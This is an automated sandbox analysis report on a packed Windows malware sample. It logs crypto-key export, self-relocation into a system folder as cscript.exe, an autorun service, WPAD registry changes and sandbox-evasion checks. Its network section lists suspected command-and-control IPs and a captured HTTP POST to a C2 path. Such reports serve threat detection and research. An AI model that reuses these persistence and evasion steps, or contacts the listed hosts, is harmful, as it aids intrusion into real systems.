8.0
High risk

53d0aa39cee8ced2dd089a89df7c919ec0b809a1f091bff88396777033d19f3b

3ea71bb177d130104b58d89e8fb340e5.exe

Analysis duration

107s

Last analysis

File size

540.1KB
Static detection / Dynamic detection
鹰眼引擎 (Hawkeye engine)
Not detected: no Hawkeye engine (鹰眼引擎) result available
Static verdict
Antivirus engines
Not detected: no antivirus engine result available
Static indicators
Queries for the computername (1 event)
Time & API Arguments Status Return Repeated
1619393838.882626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (6 events)
Time & API Arguments Status Return Repeated
1619393825.475626
CryptGenKey
crypto_handle: 0x002f4d28
algorithm_identifier: 0x0000660e ()
provider_handle: 0x002f4250
flags: 1
key: f8N»¥½_bžEÎ9ö°º
success 1 0
1619393838.882626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤hô¦šŠÞG~÷{¢už•ŸG‹²çü²ìé’৐‰55ÍÐ=¾íUMsØÂ|2:i‰ ¸ Å}…$2ÅyÑó›3"´ã)¶›Ð5{ਜ਼VDë•Ç‘:¥yµ…¨H•Ýw¨MŽ
blob_type: 1
flags: 64
success 1 0
1619393866.241626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤í.òžÃ}zŸ×G¡ÏÊwµEÓ–*©L‘8VOd-GLö¸€áÚÜ ™F4F.ŸÏEh+céYò±ÄôÇ·.(›133¥*™}êé§Åç!û8‚lÂ1J 
blob_type: 1
flags: 64
success 1 0
1619393870.382626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤ ْñ¤ƒ¬Âg¥Knë›Óù¬Ú¬ämÐÛ¦ÑþßÄgùP×.ÛêYÕ_Fšÿ祖E2×ò|Åsf\DN† J=F¯j}¶06£;¨ R³n(üè.¶ÒçA°6J
blob_type: 1
flags: 64
success 1 0
1619393873.663626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤d~zQ:œOÞš´í¿×u@¤‘\q OZ ÓØÂ`âx!÷#&¹·L.TŸýxV{ØÚ´˜R‰R#º\ݦN¾›Zî/Çóì7¦$” ›ÂÛ¨Œ—: JžYS
blob_type: 1
flags: 64
success 1 0
1619393894.913626
CryptExportKey
crypto_handle: 0x002f4d28
crypto_export_handle: 0x002f4318
buffer: f¤ €°°'ÃPT¡3Ru/Ñ/Q„ÔéðÉlŒëƒPSÃít±§#%5币¹H0Hè1åëìlêK%[D«}fî$'CbuŠØ¶e.æéÆn/ÒD3Ír
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 event)
packer Armadillo v1.71
Behavioral verdict
Dynamic indicators
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619393817.350876
NtAllocateVirtualMemory
process_identifier: 1056
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00520000
success 0 0
1619393449.43277
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00000000040c0000
success 0 0
1619393825.147626
NtAllocateVirtualMemory
process_identifier: 152
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01e30000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 events)
Moves the original executable to a new location (1 event)
Time & API Arguments Status Return Repeated
1619393818.491876
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3ea71bb177d130104b58d89e8fb340e5.exe
newfilepath: C:\Windows\SysWOW64\wmp\cscript.exe
newfilepath_r: C:\Windows\SysWOW64\wmp\cscript.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3ea71bb177d130104b58d89e8fb340e5.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619393839.507626
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 event)
process cscript.exe
Reads the system's User Agent and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1619393839.163626
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
Network communication
Communicates with host for which no DNS query was performed (6 events)
host 105.209.235.113
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
Installs itself for autorun at Windows startup (1 event)
service_name cscript service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\wmp\cscript.exe"
Created a service where a service was also not started (1 event)
Time & API Arguments Status Return Repeated
1619393823.897876
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x02e43ef0
display_name: cscript
error_control: 0
service_name: cscript
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\wmp\cscript.exe"
filepath_r: "C:\Windows\SysWOW64\wmp\cscript.exe"
service_manager_handle: 0x02e5fcf0
desired_access: 2
service_type: 16
password:
success 48512752 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1619393842.085626
RegSetValueExA
key_handle: 0x00000390
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x00000390
value: P½Ci :×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x00000390
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619393842.085626
RegSetValueExW
key_handle: 0x00000390
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x000003a8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x000003a8
value: P½Ci :×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619393842.085626
RegSetValueExA
key_handle: 0x000003a8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619393842.100626
RegSetValueExW
key_handle: 0x0000038c
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 event)
file C:\Windows\SysWOW64\wmp\cscript.exe:Zone.Identifier
Connects to IP addresses that are no longer responding to requests (legitimate services will usually remain up and running) (6 events)
dead_host 24.26.151.3:80
dead_host 172.217.160.110:443
dead_host 162.144.42.60:8080
dead_host 172.217.24.14:443
dead_host 192.168.56.101:49196
dead_host 68.183.233.80:8080
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were captured while the sample ran


PE Compile Time

2020-08-28 00:19:03

Imports

Library MFC42.DLL:
0x419090
0x419094
0x419098
0x41909c
0x4190a0
0x4190a4
0x4190a8
0x4190ac
0x4190b0
0x4190b4
0x4190b8
0x4190bc
0x4190c0
0x4190c4
0x4190c8
0x4190cc
0x4190d0
0x4190d4
0x4190d8
0x4190dc
0x4190e0
0x4190e4
0x4190e8
0x4190ec
0x4190f0
0x4190f4
0x4190f8
0x4190fc
0x419100
0x419104
0x419108
0x41910c
0x419110
0x419114
0x419118
0x41911c
0x419120
0x419124
0x419128
0x41912c
0x419130
0x419134
0x419138
0x41913c
0x419140
0x419144
0x419148
0x41914c
0x419150
0x419154
0x419158
0x41915c
0x419160
0x419164
0x419168
0x41916c
0x419170
0x419174
0x419178
0x41917c
0x419180
0x419184
0x419188
0x41918c
0x419190
0x419194
0x419198
0x41919c
0x4191a0
0x4191a4
0x4191a8
0x4191ac
0x4191b0
0x4191b4
0x4191b8
0x4191bc
0x4191c0
0x4191c4
0x4191c8
0x4191cc
0x4191d0
0x4191d4
0x4191d8
0x4191dc
0x4191e0
0x4191e4
0x4191e8
0x4191ec
0x4191f0
0x4191f4
0x4191f8
0x4191fc
0x419200
0x419204
0x419208
0x41920c
0x419210
0x419214
0x419218
0x41921c
0x419220
0x419224
0x419228
0x41922c
0x419230
0x419234
0x419238
0x41923c
0x419240
0x419244
0x419248
0x41924c
0x419250
0x419254
0x419258
0x41925c
0x419260
0x419264
0x419268
0x41926c
0x419270
0x419274
0x419278
0x41927c
0x419280
0x419284
0x419288
0x41928c
0x419290
0x419294
0x419298
0x41929c
0x4192a0
0x4192a4
0x4192a8
0x4192ac
0x4192b0
0x4192b4
0x4192b8
0x4192bc
0x4192c0
0x4192c4
0x4192c8
0x4192cc
0x4192d0
Library MSVCRT.dll:
0x4192ec _except_handler3
0x4192f0 _setmbcp
0x4192f4 __CxxFrameHandler
0x4192f8 _EH_prolog
0x4192fc memset
0x419300 strlen
0x419304 _ftol
0x419308 _mbsnbcpy
0x41930c _wcslwr
0x419310 malloc
0x419314 _mbsstr
0x419318 __dllonexit
0x41931c _onexit
0x419320 _exit
0x419324 _XcptFilter
0x419328 exit
0x41932c _acmdln
0x419330 __getmainargs
0x419334 _initterm
0x419338 __setusermatherr
0x41933c _adjust_fdiv
0x419340 __p__commode
0x419344 __p__fmode
0x419348 __set_app_type
0x41934c _controlfp
Library KERNEL32.dll:
0x419058 GetStartupInfoA
0x41905c GetModuleHandleA
0x419060 ExitProcess
0x419064 GetLastError
0x419068 VirtualAlloc
0x41906c FreeLibrary
0x419070 LoadLibraryA
0x419078 lstrcpyA
0x41907c WinExec
0x419080 lstrlenA
0x419084 GetProcAddress
0x419088 lstrcatA
Library USER32.dll:
0x419360 LoadIconA
0x419364 InSendMessage
0x419368 CreateWindowExA
0x41936c ShowWindow
0x419370 KillTimer
0x419374 SetWindowLongA
0x419378 GetIconInfo
0x41937c SetTimer
0x419380 PtInRect
0x419384 ScreenToClient
0x419388 GetMessagePos
0x41938c IsWindow
0x419390 CopyIcon
0x419394 LoadCursorA
0x419398 GetDC
0x41939c CreateIconIndirect
0x4193a0 EnableWindow
0x4193a4 FillRect
0x4193a8 DrawStateA
0x4193ac GetClientRect
0x4193b0 CopyRect
0x4193b4 FrameRect
0x4193b8 InflateRect
0x4193bc GetSysColor
0x4193c0 OffsetRect
0x4193c4 DrawFocusRect
0x4193c8 GetWindowRect
0x4193cc GetSubMenu
0x4193d0 TrackPopupMenuEx
0x4193d4 PostMessageA
0x4193d8 ClientToScreen
0x4193dc WindowFromPoint
0x4193e0 GetActiveWindow
0x4193e4 InvalidateRect
0x4193e8 LoadMenuA
0x4193ec ReleaseDC
0x4193f0 LoadImageA
0x4193f4 SetCursor
0x4193f8 GetParent
0x4193fc GetNextDlgTabItem
0x419400 SendMessageA
0x419404 GetWindowLongA
0x419408 DestroyIcon
0x41940c DestroyCursor
0x419410 DestroyMenu
0x419414 MessageBeep
Library GDI32.dll:
0x41901c CreateFontIndirectA
0x419020 GetObjectA
0x419024 GetPixel
0x419028 SetPixel
0x41902c CreateBitmap
0x419030 DeleteObject
0x419034 GetStockObject
0x419038 SelectObject
0x419040 CreateCompatibleDC
0x419044 BitBlt
0x419048 DeleteDC
0x41904c SetTextColor
0x419050 SetBkColor
Library ADVAPI32.dll:
0x419000 RegQueryValueA
0x419004 RegOpenKeyExA
0x419008 RegCloseKey
Library SHELL32.dll:
0x419354 ShellExecuteExA
0x419358 ShellExecuteA
Library COMCTL32.dll:
0x419010 _TrackMouseEvent
Library MSVCP60.dll:

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49197 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 62191 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 54178 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56539 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/yf0k5fYCBGk2Awm/3HPB/2foiQx/lZGKO3FVHw7KLNr5/aOmO178HBGzK6hVrl/uAcohFS9o/
POST /yf0k5fYCBGk2Awm/3HPB/2foiQx/lZGKO3FVHw7KLNr5/aOmO178HBGzK6hVrl/uAcohFS9o/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------3f1c9b893da4a13120970093476d3c77
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.